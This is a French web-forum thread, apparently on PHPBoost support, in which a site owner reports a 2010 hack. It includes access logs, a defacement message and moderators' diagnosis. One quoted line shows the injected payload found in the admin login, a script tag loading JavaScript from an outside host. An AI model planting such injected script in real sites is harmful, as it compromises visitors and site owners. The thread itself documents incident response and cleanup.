site piraté
superbibi Membre non connecté
-
Booster Bazooka
- Voir le profil du membre superbibi
- Inscrit le : 20/09/2009
- Site internet
je me suis fait hacker mon site sous phpboost 3.
je vous donne quelques ligne de log récupérer, je peu vous donnée la totaliter des logs si besoin sur demande.
Citation :
78.125.182.94 jestermanagement.org - [19/Nov/2010:23:39:38 +0100] "POST /shoutbox/xmlhttprequest.php?refresh=1&token=ce9f0f3b14d4a3fd4ea858ed21a15199d219e349a8cf9b02e21798ab31ef94b1 HTTP/1.1" 200 753 "http://jestermanagement.org/member/member.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.15) Gecko/20101026 Firefox/3.5.15"
78.125.182.94 jestermanagement.org - [19/Nov/2010:23:40:37 +0100] "POST /database/admin_database.php?query=1&token=ce9f0f3b14d4a3fd4ea858ed21a15199d219e349a8cf9b02e21798ab31ef94b1 HTTP/1.1" 200 5313 "http://jestermanagement.org/database/admin_database.php?query=1&token=ce9f0f3b14d4a3fd4ea858ed21a15199d219e349a8cf9b02e21798ab31ef94b1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.15) Gecko/20101026 Firefox/3.5.15"
78.125.182.94 jestermanagement.org - [19/Nov/2010:23:40:38 +0100] "GET /contact/contact_mini.png HTTP/1.1" 200 1156 "http://jestermanagement.org/database/admin_database.php?query=1&token=ce9f0f3b14d4a3fd4ea858ed21a15199d219e349a8cf9b02e21798ab31ef94b1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.15) Gecko/20101026 Firefox/3.5.15"
78.125.182.94 jestermanagement.org - [19/Nov/2010:23:40:38 +0100] "GET /templates/kit54b/theme/images/contentbg.png HTTP/1.1" 302 506 "http://jestermanagement.org/templates/kit54b/theme/admin.css" "Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.15) Gecko/20101026 Firefox/3.5.15"
78.125.182.94 jestermanagement.org - [19/Nov/2010:23:40:38 +0100] "GET /member/404.php HTTP/1.1" 404 5272 "http://jestermanagement.org/templates/kit54b/theme/admin.css" "Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.15) Gecko/20101026 Firefox/3.5.15"
78.125.182.94 jestermanagement.org - [19/Nov/2010:23:40:38 +0100] "POST /shoutbox/xmlhttprequest.php?refresh=1&token=ce9f0f3b14d4a3fd4ea858ed21a15199d219e349a8cf9b02e21798ab31ef94b1 HTTP/1.1" 200 752 "http://jestermanagement.org/member/member.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.15) Gecko/20101026 Firefox/3.5.15"
78.125.182.94 jestermanagement.org - [19/Nov/2010:23:39:38 +0100] "POST /shoutbox/xmlhttprequest.php?refresh=1&token=ce9f0f3b14d4a3fd4ea858ed21a15199d219e349a8cf9b02e21798ab31ef94b1 HTTP/1.1" 200 753 "http://jestermanagement.org/member/member.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.15) Gecko/20101026 Firefox/3.5.15"
78.125.182.94 jestermanagement.org - [19/Nov/2010:23:40:37 +0100] "POST /database/admin_database.php?query=1&token=ce9f0f3b14d4a3fd4ea858ed21a15199d219e349a8cf9b02e21798ab31ef94b1 HTTP/1.1" 200 5313 "http://jestermanagement.org/database/admin_database.php?query=1&token=ce9f0f3b14d4a3fd4ea858ed21a15199d219e349a8cf9b02e21798ab31ef94b1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.15) Gecko/20101026 Firefox/3.5.15"
78.125.182.94 jestermanagement.org - [19/Nov/2010:23:40:38 +0100] "GET /contact/contact_mini.png HTTP/1.1" 200 1156 "http://jestermanagement.org/database/admin_database.php?query=1&token=ce9f0f3b14d4a3fd4ea858ed21a15199d219e349a8cf9b02e21798ab31ef94b1" "Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.15) Gecko/20101026 Firefox/3.5.15"
78.125.182.94 jestermanagement.org - [19/Nov/2010:23:40:38 +0100] "GET /templates/kit54b/theme/images/contentbg.png HTTP/1.1" 302 506 "http://jestermanagement.org/templates/kit54b/theme/admin.css" "Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.15) Gecko/20101026 Firefox/3.5.15"
78.125.182.94 jestermanagement.org - [19/Nov/2010:23:40:38 +0100] "GET /member/404.php HTTP/1.1" 404 5272 "http://jestermanagement.org/templates/kit54b/theme/admin.css" "Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.15) Gecko/20101026 Firefox/3.5.15"
78.125.182.94 jestermanagement.org - [19/Nov/2010:23:40:38 +0100] "POST /shoutbox/xmlhttprequest.php?refresh=1&token=ce9f0f3b14d4a3fd4ea858ed21a15199d219e349a8cf9b02e21798ab31ef94b1 HTTP/1.1" 200 752 "http://jestermanagement.org/member/member.php" "Mozilla/5.0 (Windows; U; Windows NT 6.1; fr; rv:1.9.1.15) Gecko/20101026 Firefox/3.5.15"
La page de hack du hackeur ouvre une pop-up avec ça de noter :
Citation :
System Failure
Hacked By SinGa
---------------
Injection SQL
---------------
Time : 22m
Date : 19/11/2010
System Failure
Hacked By SinGa
---------------
Injection SQL
---------------
Time : 22m
Date : 19/11/2010
Voilà, le site est laisser tel quelle si jamais vous avez besoin de voir.
a+
ben.popeye Membre non connecté
-
Modérateur
- Voir le profil du membre ben.popeye
- Inscrit le : 04/08/2005
- Site internet
- Groupes :
-
Equipe Historique
Est-ce que tu utilises Firefox 3.5.15 ?
Une requête qui a été exécutée via l'interface d'administration pourrait être la source de l'attaque.
Êtes-vous plusieurs administrateurs ? Si oui, leur fais-tu confiance à 100 %.
L'attaque a été faute en mettant du code javascript dans le login de l'administrateur, cela se fait facilement si on est administrateur, c'est pour cela que je te demande si vous êtes plusieurs administrateurs.
Dans les autres cas, il y a peut-être une faille de sécurité qui a été exploitée, mais dans ce cas-là il nous faut les logs pour pouvoir l'identifier.
superbibi Membre non connecté
-
Booster Bazooka
- Voir le profil du membre superbibi
- Inscrit le : 20/09/2009
- Site internet
Je suis le seul administrateur, je navigue sous google chrome, et je n’exécute jamais de requête directement car je maîtrise mal le langage SQL.
je t'envois un liens vers ou télécharger le fichier de log en privée.
une chose dont je suis sur c'est que ce n'est pas moi qui est fait cette action.
ben.popeye Membre non connecté
-
Modérateur
- Voir le profil du membre ben.popeye
- Inscrit le : 04/08/2005
- Site internet
- Groupes :
-
Equipe Historique
Il faut aller dans la base de données (via PHPMyAdmin), aller dans la table phpboost_member et éditer l'entrée où l'id vaut 1 (c'est le compte administrateur).
Le login correspondant semble avoir été modifié (c'est par là qu'a été faite l'attaque), il faut remettre le bon login. Une fois cette page validée, le site devrait reprendre son fonctionnement normal (à condition comme je l'ai dit plus haut que l'attaque n'ait porté que sur la modification du login).
Si tu ne sais pas comment faire la manipulation que j'ai décrite, envoie-moi ton accès à ta base de données, je m'en occuperai.
De mon côté j'ai commencé à éplucher les logs, l'utilisateur que je considère comme l'attaquant à cause de plusieurs facteurs a exécuté plusieurs milliers de requêtes, ce n'est donc pas simple de s'y retrouver... J'essaie de poursuivre pour déboucher sur la découverte de la faille, si tant est qu'il y en a une mais pour l'instant c'est fort probable.
tony Membre non connecté
-
Booster Mortier
- Voir le profil du membre tony
- Inscrit le : 11/11/2009
Bonne chance dans tes recherches Ben
Édité par tony Le 23/11/2010 à 09h07
Visiteur
si tu est en mutualiser pas de souci, si tu est bien sur un ks, je te suggère de faire le nécessaire.
autre petit détail ton mot de passe etait assé "sécure" ?
superbibi Membre non connecté
-
Booster Bazooka
- Voir le profil du membre superbibi
- Inscrit le : 20/09/2009
- Site internet
ben, je vais faire ce que tu as dit,
Saturnin, j'ai plutôt l'impression que le gars (celons les logs que j'ai lu) à eu accès à l'administration, et à simplement exécuter une requête dans le champs prévu pour (dans gestion SQL).
je ne pense pas qu'il sois passer pas la base directement sinon cette ligne de log n'apparaîtrais pas :
Citation :
/database/admin_database.php?query=1&token=ce9f0f3b14d4a3fd4ea858ed21a15199d219e349a8cf9b02e21798ab31ef94b1
car on vois bien qu'il à exécuter une requête sur la page admin_database
et pour info je suis chez ovh en mutualisé
edit : Ben bien vu, voici mon login dans la bdd :
Citation :
jester<script src=http://fullcheat.com/a.js></script>
je corrige
Édité par superbibi Le 23/11/2010 à 15h19
superbibi Membre non connecté
-
Booster Bazooka
- Voir le profil du membre superbibi
- Inscrit le : 20/09/2009
- Site internet
je retourne looker la BDD.
ben.popeye Membre non connecté
-
Modérateur
- Voir le profil du membre ben.popeye
- Inscrit le : 04/08/2005
- Site internet
- Groupes :
-
Equipe Historique
Essaie de changer ton mot de passe administrateur, si ça se trouve c'est simplement qu'il a trouvé ton mot de passe, mais ça me parait peu probable dans la mesure où il indiquait qu'il était passé par une injection SQL.
superbibi Membre non connecté
-
Booster Bazooka
- Voir le profil du membre superbibi
- Inscrit le : 20/09/2009
- Site internet
j'ai retrouver hier sur le même serveur uploader dans un autre dossier il y avais un système de faq que j'avais coder moi-même, elle utilisais des GET, et je ne les avais pas sécuriser, il est probable que le pirate sois passer par là.
j'ai supprimer les pages et depuis plus de problème.
faut dire aussi que j'ai fait supprimer l’hébergement qui contenais ses script javascript qui on servi au hacking.
CrowkaiT Membre non connecté
-
Modérateur
- Voir le profil du membre CrowkaiT
- Inscrit le : 17/06/2005
- Site internet
- Groupes :
-
Equipe Historique
superbibi Membre non connecté
-
Booster Bazooka
- Voir le profil du membre superbibi
- Inscrit le : 20/09/2009
- Site internet
CrowkaiT :
Donc le problème est réglé et ne viens pas de nous ?
A vrais dire je ne sais pas, il est probable que le pirate sois passer par là, mais en même temps j'ai pas vu dans les logs une requête vers le dossier /spheriz/faq.php
pour le moment nous pouvons je penses classer ceci, en cas de nouveau problème je vous recontacterais.
ben.popeye Membre non connecté
-
Modérateur
- Voir le profil du membre ben.popeye
- Inscrit le : 04/08/2005
- Site internet
- Groupes :
-
Equipe Historique
ReidLos Membre non connecté
-
Modérateur
- Voir le profil du membre ReidLos
- Inscrit le : 27/02/2009
- Site internet
- Groupes :
-
Equipe Développement
superbibi Membre non connecté
-
Booster Bazooka
- Voir le profil du membre superbibi
- Inscrit le : 20/09/2009
- Site internet
le problème ne s'est pas remanifesté, ça devais venir de mon script qui n'était pas sécuriser.
Reidlos, je t'envois un lien vers les logs et pour le module faq, je t'envois les script
Répondre
Vous n'êtes pas autorisé à écrire dans cette catégorie